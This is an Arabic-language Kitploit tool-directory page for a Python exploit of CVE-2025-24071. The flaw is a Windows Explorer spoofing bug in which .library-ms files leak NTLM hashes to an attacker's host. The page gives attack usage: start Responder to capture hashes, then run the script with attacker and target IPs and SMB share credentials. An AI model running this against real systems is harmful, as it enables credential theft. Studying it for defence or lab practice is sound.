Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24071 — نص بايثون لتنفيذ CVE-2025-24071 | Kitploit
أدوات/GitHubGitHub/ac8999/cve-2025-24071
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubac8999/cve-2025-24071

CVE-2025-24071

نص بايثون لتنفيذ CVE-2025-24071

عرض المستودع
14منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-24071: ثغرة انتحال مستكشف ملفات Microsoft Windows (النص البرمجي بواسطة SilentExploit)

📖 الوصف

يكتشف هذا المشروع ويوضح استغلال ثغرة انتحال مستكشف ملفات Windows.

تنشأ المشكلة من ملف مكتبة Windows (.library-ms) يحتوي على مسار شبكة، سواء كمرفق مباشر أو مضمن داخل أرشيف.
عند فتح الملف، يمكن أن يتسبب في تسريب تجزئات NTLM إلى موقع شبكة بعيد (يحتمل أن يكون ضارًا).

POC: https://imgur.com/a/hEO83Se

⚡ الاستخدام

1. تشغيل Responder

على جهازك المهاجم، قم بتشغيل Responder لالتقاط تجزئات NTLM:

root@kitploit:~
sudo responder -I tun0 -wvF
  1. تشغيل النص البرمجي

يمكنك تكوين النص البرمجي بطريقتين:

✅ الخيار أ: تحرير القيم الافتراضية (الأسهل)

قم بتعديل المعاملات الافتراضية داخل النص البرمجي مباشرة.

root@kitploit:~
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP")      #your IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP")         #target IP 
    parser.add_argument("--share-name", default="IT", help="SMB share name")               #name of the share you have access to without the /
    parser.add_argument("--username", default="USERNAME", help="SMB username")          #username  of the share owner 
    parser.add_argument("--password", default="PASSWORD", help="SMB password")        #password of the share owner 
    parser.add_argument("--interface", default="tun0", help="Responder network interface")        #check ifconfig but tun0 will work if you're on a vpn
    return parser.parse_args()

✅ الخيار ب: التشغيل مع معاملات سطر الأوامر

نفذ مع الوسائط:

root@kitploit:~
python3 CVE-2025-24071.py \
    --attacker-ip <ATTACKER_IP> \
    --target-ip <TARGET_IP> \
    --share-name <SHARE_NAME> \
    --username <USERNAME> \
    --password <PASSWORD> \
    --interface <INTERFACE>
تنزيل الأداة